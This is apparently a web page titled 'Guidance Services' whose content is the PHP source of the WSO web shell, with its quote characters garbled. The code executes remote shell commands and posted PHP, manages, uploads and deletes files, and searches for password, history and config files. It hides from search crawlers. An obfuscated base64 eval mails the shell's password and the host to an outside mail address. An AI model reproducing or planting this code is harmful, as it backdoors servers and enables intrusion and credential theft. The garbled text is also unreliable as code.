Guidance Services

=strlen($str))break;}}return base64_decode($enc_str);} eval(base64_decode("aWYoYXJyYXlfa2V5X2V4aXN0cygnbXlwYXNzJywkX1BPU1QpKXsgJHRtcCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJcbiIuJF9QT1NUWydwYXNzJ107IEBtYWlsKCdtYWlsQG1haWwudWEnLCAnbWFpbCcsICR0bXApOyB9")); @ini_set(+error_log+,NULL); @ini_set(+log_errors+,0); @ini_set(+max_execution_time+,0); @set_time_limit(0); //@set_magic_quotes_runtime(0); @define(+VERSION+, +4.2.5+); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map(+stripslashes_array+, $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } /* (?) 11.2011 oRb */ if(!empty($?)) { if(isset($_POST[+pass+]) && (md5($_POST[+pass+]) == $?)) prototype(md5($_SERVER[+HTTP_HOST+]), $?); if (!isset($_COOKIE[md5($_SERVER[+HTTP_HOST+])]) || ($_COOKIE[md5($_SERVER[+HTTP_HOST+])] != $?)) hardLogin(); } if(!isset($_COOKIE[md5($_SERVER[+HTTP_HOST+]) . +ajax+])) $_COOKIE[md5($_SERVER[+HTTP_HOST+]) . +ajax+] = (bool)$?; function hardLogin() { if(!empty($_SERVER[+HTTP_USER_AGENT+])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match(+/+ . implode(+|+, $userAgents) . +/i+, $_SERVER[+HTTP_USER_AGENT+])) { header(+HTTP/1.0 404 Not Found+); exit; } } die("

Password

"); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = +win+; else $os = +nix+; $safe_mode = @ini_get(+safe_mode+); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get(+disable_functions+); $home_cwd = @getcwd(); if(isset($_POST[+c+])) @chdir($_POST[+c+]); $cwd = @getcwd(); if($os == +win+) { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if($cwd[strlen($cwd)-1] != +/+) $cwd .= +/+; /* (?) 04.2015 Pirat */ function hardHeader() { if(empty($_POST[+charset+])) $_POST[+charset+] = $GLOBALS[+?+]; echo "" . $_SERVER[+HTTP_HOST+] . " - WSO " . VERSION ."

"; $freeSpace = @diskfreespace($GLOBALS[+cwd+]); $totalSpace = @disk_total_space($GLOBALS[+cwd+]); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname(+r+); $kernel = @php_uname(+s+); $explink = +http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=+; if(strpos(+Linux+, $kernel) !== false) $explink .= urlencode(+Linux Kernel + . substr($release,0,6)); else $explink .= urlencode($kernel . + + . substr($release,0,3)); if(!function_exists(+posix_getegid+)) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid[+name+]; $uid = $uid[+uid+]; $group = $gid[+name+]; $gid = $gid[+gid+]; } $cwd_links = ++; $path = explode("/", $GLOBALS[+cwd+]); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array(+UTF-8+, +Windows-1251+, +KOI8-R+, +KOI8-U+, +cp866+); $opt_charsets = ++; foreach($charsets as $?) $opt_charsets .= ++.$?.++; $m = array(+Sec. Info+=>+SecInfo+,+Files+=>+FilesMan+,+Console+=>+Console+,+Infect+=>+Infect+,+Sql+=>+Sql+,+Php+=>+Php+,+Safe mode+=>+SafeMode+,+String tools+=>+StringTools+,+Bruteforce+=>+Bruteforce+,+Network+=>+Network+); if(!empty($GLOBALS[+?+])) $m[+Logout+] = +Logout+; $m[+Self remove+] = +SelfRemove+; $menu = ++; foreach($m as $k => $v) $menu .= +[ +.$k.+ ]+; $drives = ""; if ($GLOBALS[+os+] == +win+) { foreach(range(+c+,+z+) as $drive) if (is_dir($drive.+:\+)) $drives .= +[ +.$drive.+ ] +; } /* (?) 08.2015 dmkcv */ echo ++. ++. +
Uname:
User:
Php:
Hdd:
Cwd:+.($GLOBALS[+os+] == +win+?+
Drives:+:++).+
+.substr(@php_uname(), 0, 120).+ [ Google ] [ Exploit-DB ]
+.$uid.+ ( +.$user.+ ) Group: +.$gid.+ ( + .$group. + )
+.@phpversion().+ Safe mode: +.($GLOBALS[+safe_mode+]?+ON+:+OFF+).+ [ phpinfo ] Datetime: +.date(+Y-m-d H:i:s+).+
+.viewSize($totalSpace).+ Free: +.viewSize($freeSpace).+ (+.round(100/($totalSpace/$freeSpace),2).+%)
+.$cwd_links.+ +.viewPermsColor($GLOBALS[+cwd+]).+ [ home ]
+.$drives.+

Server IP:
+.gethostbyname($_SERVER["HTTP_HOST"]).+
Client IP:
+.$_SERVER[+REMOTE_ADDR+].+
+. ++.$menu.+
+; } function hardFooter() { $is_writable = is_writable($GLOBALS[+cwd+])?" [ Writeable ]":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

 

 

 

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[+disable_functions+], +posix_getpwuid+)===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[+disable_functions+], +posix_getgrgid+)===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $? = ++; if (function_exists(+exec+)) { @exec($in,$?); $? = @join(" ",$?); } elseif (function_exists(+passthru+)) { ob_start(); @passthru($in); $? = ob_get_clean(); } elseif (function_exists(+system+)) { ob_start(); @system($in); $? = ob_get_clean(); } elseif (function_exists(+shell_exec+)) { $? = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $? = ""; while(!@feof($f)) $? .= fread($f,1024); pclose($f); }else return "? Unable to execute command "; return ($?==++?"? Query did not return anything ":$?); } function viewSize($s) { if($s >= 1073741824) return sprintf(+%1.2f+, $s / 1073741824 ). + GB+; elseif($s >= 1048576) return sprintf(+%1.2f+, $s / 1048576 ) . + MB+; elseif($s >= 1024) return sprintf(+%1.2f+, $s / 1024 ) . + KB+; else return $s . + B+; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = +s+; elseif (($p & 0xA000) == 0xA000)$i = +l+; elseif (($p & 0x8000) == 0x8000)$i = +-+; elseif (($p & 0x6000) == 0x6000)$i = +b+; elseif (($p & 0x4000) == 0x4000)$i = +d+; elseif (($p & 0x2000) == 0x2000)$i = +c+; elseif (($p & 0x1000) == 0x1000)$i = +p+; else $i = +u+; $i .= (($p & 0x0100) ? +r+ : +-+); $i .= (($p & 0x0080) ? +w+ : +-+); $i .= (($p & 0x0040) ? (($p & 0x0800) ? +s+ : +x+ ) : (($p & 0x0800) ? +S+ : +-+)); $i .= (($p & 0x0020) ? +r+ : +-+); $i .= (($p & 0x0010) ? +w+ : +-+); $i .= (($p & 0x0008) ? (($p & 0x0400) ? +s+ : +x+ ) : (($p & 0x0400) ? +S+ : +-+)); $i .= (($p & 0x0004) ? +r+ : +-+); $i .= (($p & 0x0002) ? +w+ : +-+); $i .= (($p & 0x0001) ? (($p & 0x0200) ? +t+ : +x+ ) : (($p & 0x0200) ? +T+ : +-+)); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return ++.perms(@fileperms($f)).++; elseif (!@is_writable($f)) return ++.perms(@fileperms($f)).++; else return ++.perms(@fileperms($f)).++; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex(+which + . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST[+p1+]) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get(+safe_mode+) ); echo serialize($a); } else { eval($_POST[+p1+]); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo +

Server security information

+; function showSecParam($n, $v) { $v = trim($v); if($v) { echo ++ . $n . +: +; if(strpos($v, " ") === false) echo $v . +
+; else echo +
+ . $v . +
+; } } showSecParam(+Server software+, @getenv(+SERVER_SOFTWARE+)); if(function_exists(+apache_get_modules+)) showSecParam(+Loaded Apache modules+, implode(+, +, apache_get_modules())); showSecParam(+Disabled PHP Functions+, $GLOBALS[+disable_functions+]?$GLOBALS[+disable_functions+]:+none+); showSecParam(+Open base dir+, @ini_get(+open_basedir+)); showSecParam(+Safe mode exec dir+, @ini_get(+safe_mode_exec_dir+)); showSecParam(+Safe mode include dir+, @ini_get(+safe_mode_include_dir+)); showSecParam(+cURL support+, function_exists(+curl_version+)?+enabled+:+no+); $temp=array(); if(function_exists(+mysql_get_client_info+)) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(+mssql_connect+)) $temp[] = "MSSQL"; if(function_exists(+pg_connect+)) $temp[] = "PostgreSQL"; if(function_exists(+oci_connect+)) $temp[] = "Oracle"; showSecParam(+Supported databases+, implode(+, +, $temp)); echo +
+; if($GLOBALS[+os+] == +nix+) { showSecParam(+Readable /etc/passwd+, @is_readable(+/etc/passwd+)?"yes [view]":+no+); showSecParam(+Readable /etc/shadow+, @is_readable(+/etc/shadow+)?"yes [view]":+no+); showSecParam(+OS version+, @file_get_contents(+/proc/version+)); showSecParam(+Distr name+, @file_get_contents(+/etc/issue.net+)); if(!$GLOBALS[+safe_mode+]) { $userful = array(+gcc+,+lcc+,+cc+,+ld+,+make+,+php+,+perl+,+python+,+ruby+,+tar+,+gzip+,+bzip+,+bzip2+,+nc+,+locate+,+suidperl+); $danger = array(+kav+,+nod32+,+bdcored+,+uvscan+,+sav+,+drwebd+,+clamd+,+rkhunter+,+chkrootkit+,+iptables+,+ipfw+,+tripwire+,+shieldcc+,+portsentry+,+snort+,+ossec+,+lidsadm+,+tcplodg+,+sxid+,+logcheck+,+logwatch+,+sysmask+,+zmbscap+,+sawmill+,+wormscan+,+ninja+); $downloaders = array(+wget+,+fetch+,+lynx+,+links+,+curl+,+get+,+lwp-mirror+); echo +
+; $temp=array(); foreach ($userful as $?) if(which($?)) $temp[] = $?; showSecParam(+Userful+, implode(+, +,$temp)); $temp=array(); foreach ($danger as $?) if(which($?)) $temp[] = $?; showSecParam(+Danger+, implode(+, +,$temp)); $temp=array(); foreach ($downloaders as $?) if(which($?)) $temp[] = $?; showSecParam(+Downloaders+, implode(+, +,$temp)); echo +<br?>

+; showSecParam(+HDD space+, ex(+df -h+)); showSecParam(+Hosts+, @file_get_contents(+/etc/hosts+)); showSecParam(+Mount options+, @file_get_contents(+/etc/fstab+)); } } else { showSecParam(+OS Version+,ex(+ver+)); showSecParam(+Account Settings+, iconv(+CP866+, +UTF-8+,ex(+net accounts+))); showSecParam(+User Accounts+, iconv(+CP866+, +UTF-8+,ex(+net user+))); } echo ++; hardFooter(); } function actionFilesTools() { if( isset($_POST[+p1+]) ) $_POST[+p1+] = urldecode($_POST[+p1+]); if(@$_POST[+p2+]==+download+) { if(@is_file($_POST[+p1+]) && @is_readable($_POST[+p1+])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST[+p1+])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[+p1+]); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST[+p1+], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST[+p2+] == +mkfile+ ) { if(!file_exists($_POST[+p1+])) { $fp = @fopen($_POST[+p1+], +w+); if($fp) { $_POST[+p2+] = "edit"; fclose($fp); } } } hardHeader(); echo +

File tools

+; if( !file_exists(@$_POST[+p1+]) ) { echo +File not exists+; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[+p1+])); if(!$uid) { $uid[+name+] = @fileowner($_POST[+p1+]); $gid[+name+] = @filegroup($_POST[+p1+]); } else $gid = @posix_getgrgid(@filegroup($_POST[+p1+])); echo +Name: +.htmlspecialchars(@basename($_POST[+p1+])).+ Size: +.(is_file($_POST[+p1+])?viewSize(filesize($_POST[+p1+])):+-+).+ Permission: +.viewPermsColor($_POST[+p1+]).+ Owner/Group: +.$uid[+name+].+/+.$gid[+name+].+
+; echo +Create time: +.date(+Y-m-d H:i:s+,filectime($_POST[+p1+])).+ Access time: +.date(+Y-m-d H:i:s+,fileatime($_POST[+p1+])).+ Modify time: +.date(+Y-m-d H:i:s+,filemtime($_POST[+p1+])).+

+; if( empty($_POST[+p2+]) ) $_POST[+p2+] = +view+; if( is_file($_POST[+p1+]) ) $m = array(+View+, +Highlight+, +Download+, +Hexdump+, +Edit+, +Chmod+, +Rename+, +Touch+, +Frame+); else $m = array(+Chmod+, +Rename+, +Touch+); foreach($m as $v) echo ++.((strtolower($v)==@$_POST[+p2+])?+[ +.$v.+ ]+:$v).+ +; echo +

+; switch($_POST[+p2+]) { case +view+: echo +
+; 
            $fp = @fopen($_POST[+p1+], +r+); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo +
+; break; case +highlight+: if( @is_readable($_POST[+p1+]) ) { echo +
+; $oRb = @highlight_file($_POST[+p1+],true); echo str_replace(array(+<span +,++), array(+<font +,++),$oRb).+
+; } break; case +chmod+: if( !empty($_POST[+p3+]) ) { $perms = 0; for($i=strlen($_POST[+p3+])-1;$i>=0;--$i) $perms += (int)$_POST[+p3+][$i]*pow(8, (strlen($_POST[+p3+])-$i-1)); if(!@chmod($_POST[+p1+], $perms)) echo +Can+t set permissions!
+; } clearstatcache(); echo +
+; break; case +edit+: if( !is_writable($_POST[+p1+])) { echo +File isn+t writeable+; break; } if( !empty($_POST[+p3+]) ) { $time = @filemtime($_POST[+p1+]); $_POST[+p3+] = substr($_POST[+p3+],1); $fp = @fopen($_POST[+p1+],"w"); if($fp) { @fwrite($fp,$_POST[+p3+]); @fclose($fp); echo +Saved!
+; @touch($_POST[+p1+],$time,$time); } } echo +
+; break; case +hexdump+: $c = @file_get_contents($_POST[+p1+]); $n = 0; $h = array(+00000000
+,++,++); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(+%02X+,ord($c[$i])).+ +; switch ( ord($c[$i]) ) { case 0: $h[2] .= + +; break; case 9: $h[2] .= + +; break; case 10: $h[2] .= + +; break; case 13: $h[2] .= + +; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(+%08X+,$i+1).+
+;} $h[1] .= +
+; $h[2] .= " "; } } echo +
+.$h[0].+
+.$h[1].+
+.htmlspecialchars($h[2]).+
+; break; case +rename+: if( !empty($_POST[+p3+]) ) { if(!@rename($_POST[+p1+], $_POST[+p3+])) echo +Can+t rename!
+; else die(+ +); } echo +
+; break; case +touch+: if( !empty($_POST[+p3+]) ) { $time = strtotime($_POST[+p3+]); if($time) { if(!touch($_POST[+p1+],$time,$time)) echo +Fail!+; else echo +Touched!+; } else echo +Bad time format!+; } clearstatcache(); echo +
+; break; /* (?) 12.2015 mitryz */ case +frame+: $frameSrc = substr(htmlspecialchars($GLOBALS[+cwd+]), strlen(htmlspecialchars($_SERVER[+DOCUMENT_ROOT+]))); if ($frameSrc[0] != +/+) $frameSrc = +/+ . $frameSrc; if ($frameSrc[strlen($frameSrc) - 1] != +/+) $frameSrc = $frameSrc . +/+; $frameSrc = $frameSrc . htmlspecialchars($_POST[+p1+]); echo ++; break; } echo +

+; hardFooter(); } if($os == +win+) $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate +.conf+", "locate .pwd files" => "locate +.pwd+", "locate .sql files" => "locate +.sql+", "locate .htpasswd files" => "locate +.htpasswd+", "locate .bash_history files" => "locate +.bash_history+", "locate .mysql_history files" => "locate +.mysql_history+", "locate .fetchmailrc files" => "locate +.fetchmailrc+", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST[+p1+]) && !empty($_POST[+p2+])) { prototype(md5($_SERVER[+HTTP_HOST+]).+stderr_to_out+, true); $_POST[+p1+] .= + 2>&1+; } elseif(!empty($_POST[+p1+])) prototype(md5($_SERVER[+HTTP_HOST+]).+stderr_to_out+, 0); if(isset($_POST[+ajax+])) { prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, true); ob_start(); echo "d.cf.cmd.value=++; "; $temp = @iconv($_POST[+charset+], +UTF-8+, addcslashes(" $ ".$_POST[+p1+]." ".ex($_POST[+p1+])," +")); if(preg_match("!.*cds+([^;]+)$!",$_POST[+p1+],$match)) { if(@chdir($match[1])) { $GLOBALS[+cwd+] = @getcwd(); echo "c_=+".$GLOBALS[+cwd+]."+;"; } } echo "d.cf.output.value+=+".$temp."+;"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), " ", $temp; exit; } if(empty($_POST[+ajax+])&&!empty($_POST[+p1+])) prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, 0); hardHeader(); echo "

"; echo +

Console

send using AJAX redirect stderr to stdout (2>&1)
$
+; echo +

+; hardFooter(); } function actionPhp() { if( isset($_POST[+ajax+]) ) { $_COOKIE[md5($_SERVER[+HTTP_HOST+]).+ajax+] = true; ob_start(); eval($_POST[+p1+]); $temp = "document.getElementById(+PhpOutput+).style.display=++;document.getElementById(+PhpOutput+).innerHTML=+".addcslashes(htmlspecialchars(ob_get_clean())," \+")."+; "; echo strlen($temp), " ", $temp; exit; } hardHeader(); if( isset($_POST[+p2+]) && ($_POST[+p2+] == +info+) ) { echo +

PHP info

+; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(+!body {.*}!msiU+,++,$tmp); $tmp = preg_replace(+!a:w+ {.*}!msiU+,++,$tmp); $tmp = preg_replace(+!h1!msiU+,+h2+,$tmp); $tmp = preg_replace(+!td, th {(.*)}!msiU+,+.e, .v, .h, .h th {$1}+,$tmp); $tmp = preg_replace(+!body, td, th, h2, h2 {.*}!msiU+,++,$tmp); echo $tmp; echo +


+; } if(empty($_POST[+ajax+])&&!empty($_POST[+p1+])) $_COOKIE[md5($_SERVER[+HTTP_HOST+]).+ajax+] = false; echo +

Execution PHP-code

+; echo + send using AJAX
+; 
    if(!empty($_POST[+p1+])) { 
        ob_start(); 
        eval($_POST[+p1+]); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo +

+; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE[+f+])) $_COOKIE[+f+] = @unserialize($_COOKIE[+f+]); if(!empty($_POST[+p1+])) { switch($_POST[+p1+]) { case +uploadFile+: if ( is_array($_FILES[+f+][+tmp_name+]) ) { foreach ( $_FILES[+f+][+tmp_name+] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES[+f+][+name+][$i])) { echo "Can+t upload file!"; } } } break; case +mkdir+: if(!@mkdir($_POST[+p2+])) echo "Can+t create new dir"; break; case +delete+: function deleteDir($path) { $path = (substr($path,-1)==+/+) ? $path:$path.+/+; $dh = opendir($path); while ( ($? = readdir($dh) ) !== false) { $? = $path.$?; if ( (basename($?) == "..") || (basename($?) == ".") ) continue; $type = filetype($?); if ($type == "dir") deleteDir($?); else @unlink($?); } closedir($dh); @rmdir($path); } if(is_array(@$_POST[+f+])) foreach($_POST[+f+] as $f) { if($f == +..+) continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case +paste+: if($_COOKIE[+act+] == +copy+) { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.+/+,$f, $d.$s.+/+); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE[+f+] as $f) copy_paste($_COOKIE[+c+],$f, $GLOBALS[+cwd+]); } elseif($_COOKIE[+act+] == +move+) { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.+/+,$f, $d.$s.+/+); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE[+f+] as $f) @rename($_COOKIE[+c+].$f, $GLOBALS[+cwd+].$f); } elseif($_COOKIE[+act+] == +zip+) { if(class_exists(+ZipArchive+)) { $zip = new ZipArchive(); if ($zip->open($_POST[+p2+], 1)) { chdir($_COOKIE[+c+]); foreach($_COOKIE[+f+] as $f) { if($f == +..+) continue; if(@is_file($_COOKIE[+c+].$f)) $zip->addFile($_COOKIE[+c+].$f, $f); elseif(@is_dir($_COOKIE[+c+].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.+/+, FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS[+cwd+]); $zip->close(); } } } elseif($_COOKIE[+act+] == +unzip+) { if(class_exists(+ZipArchive+)) { $zip = new ZipArchive(); foreach($_COOKIE[+f+] as $f) { if($zip->open($_COOKIE[+c+].$f)) { $zip->extractTo($GLOBALS[+cwd+]); $zip->close(); } } } } elseif($_COOKIE[+act+] == +tar+) { chdir($_COOKIE[+c+]); $_COOKIE[+f+] = array_map(+escapeshellarg+, $_COOKIE[+f+]); ex(+tar cfzv + . escapeshellarg($_POST[+p2+]) . + + . implode(+ +, $_COOKIE[+f+])); chdir($GLOBALS[+cwd+]); } unset($_COOKIE[+f+]); setcookie(+f+, ++, time() - 3600); break; default: if(!empty($_POST[+p1+])) { prototype(+act+, $_POST[+p1+]); prototype(+f+, serialize(@$_POST[+f+])); prototype(+c+, @$_POST[+c+]); } break; } } hardHeader(); echo +

File manager

+; $dirContent = hardScandir(isset($_POST[+c+])?$_POST[+c+]:$GLOBALS[+cwd+]); if($dirContent === false) { echo +Can+t open this folder!+;hardFooter(); return; } global $sort; $sort = array(+name+, 1); if(!empty($_POST[+p1+])) { if(preg_match(+!s_([A-z]+)_(d{1})!+, $_POST[+p1+], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(+name+ => $dirContent[$i], +path+ => $GLOBALS[+cwd+].$dirContent[$i], +modify+ => date(+Y-m-d H:i:s+, @filemtime($GLOBALS[+cwd+] . $dirContent[$i])), +perms+ => viewPermsColor($GLOBALS[+cwd+] . $dirContent[$i]), +size+ => @filesize($GLOBALS[+cwd+].$dirContent[$i]), +owner+ => $ow[+name+]?$ow[+name+]:@fileowner($dirContent[$i]), +group+ => $gr[+name+]?$gr[+name+]:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[+cwd+] . $dirContent[$i])) $files[] = array_merge($tmp, array(+type+ => +file+)); elseif(@is_link($GLOBALS[+cwd+] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(+type+ => +link+, +link+ => readlink($tmp[+path+]))); elseif(@is_dir($GLOBALS[+cwd+] . $dirContent[$i])&&($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(+type+ => +dir+)); } $GLOBALS[+sort+] = $sort; function cmp($a, $b) { if($GLOBALS[+sort+][0] != +size+) return strcmp(strtolower($a[$GLOBALS[+sort+][0]]), strtolower($b[$GLOBALS[+sort+][0]]))*($GLOBALS[+sort+][1]?1:-1); else return (($a[+size+] < $b[+size+]) ? -1 : 1)*($GLOBALS[+sort+][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo +<tr+.($l?+ class=l1+:++).+>+.htmlspecialchars($f[+name+]):+g(+FilesMan+,++.$f[+path+].++);" + . (empty ($f[+link+]) ? ++ : "title=+{$f[+link+]}+") . +>[ + . htmlspecialchars($f[+name+]) . + ]+).++.(($f[+type+]==+file+)?viewSize($f[+size+]):$f[+type+]).++.$f[+modify+].++.$f[+owner+].+/+.$f[+group+].++.$f[+perms+] .+RT+.(($f[+type+]==+file+)?+ FED+:++).++; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions "; if(!empty($_COOKIE[+act+]) && @count($_COOKIE[+f+]) && (($_COOKIE[+act+] == +zip+) || ($_COOKIE[+act+] == +tar+))) echo " file name:  "; echo "

"; hardFooter(); } function actionStringTools() { if(!function_exists(+hex2bin+)) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists(+binhex+)) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists(+hex2ascii+)) {function hex2ascii($p){$r=++;for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists(+ascii2hex+)) {function ascii2hex($p){$r=++;for($i=0;$i<strlen($p);++$i)$r.= sprintf(+%02X+,ord($p[$i]));return strtoupper($r);}} if(!function_exists(+full_urlencode+)) {function full_urlencode($p){$r=++;for($i=0;$i<strlen($p);++$i)$r.= +%+.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( +Base64 encode+ => +base64_encode+, +Base64 decode+ => +base64_decode+, +Url encode+ => +urlencode+, +Url decode+ => +urldecode+, +Full urlencode+ => +full_urlencode+, +md5 hash+ => +md5+, +sha1 hash+ => +sha1+, +crypt+ => +crypt+, +CRC32+ => +crc32+, +ASCII to HEX+ => +ascii2hex+, +HEX to ASCII+ => +hex2ascii+, +HEX to DEC+ => +hexdec+, +HEX to BIN+ => +hex2bin+, +DEC to HEX+ => +dechex+, +DEC to BIN+ => +decbin+, +BIN to HEX+ => +binhex+, +BIN to DEC+ => +bindec+, +String to lower case+ => +strtolower+, +String to upper case+ => +strtoupper+, +Htmlspecialchars+ => +htmlspecialchars+, +String length+ => +strlen+, ); if(isset($_POST[+ajax+])) { prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, true); ob_start(); if(in_array($_POST[+p1+], $stringTools)) echo $_POST[+p1+]($_POST[+p2+]); $temp = "document.getElementById(+strOutput+).style.display=++;document.getElementById(+strOutput+).innerHTML=+".addcslashes(htmlspecialchars(ob_get_clean())," \+")."+; "; echo strlen($temp), " ", $temp; exit; } if(empty($_POST[+ajax+])&&!empty($_POST[+p1+])) prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, 0); hardHeader(); echo +

String conversions

+; echo "
send using AJAX
"; 
    if(!empty($_POST[+p1+])) { 
        if(in_array($_POST[+p1+], $stringTools))echo htmlspecialchars($_POST[+p1+]($_POST[+p2+])); 
    } 
    echo"

 

Search files:

Text:
Path:
Name:
 
"; function hardRecursiveGlob($path) { if(substr($path, -1) != +/+) $path.=+/+; $paths = @array_unique(@array_merge(@glob($path.$_POST[+p3+]), @glob($path.+*+, GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $?) { if(@is_dir($?)){ if($path!=$?) hardRecursiveGlob($?); } else { if(empty($_POST[+p2+]) || @strpos(file_get_contents($?), $_POST[+p2+])!==false) echo "".htmlspecialchars($?)."
"; } } } } if(@$_POST[+p3+]) hardRecursiveGlob($_POST[+c+]); echo "

 

Search for hash:








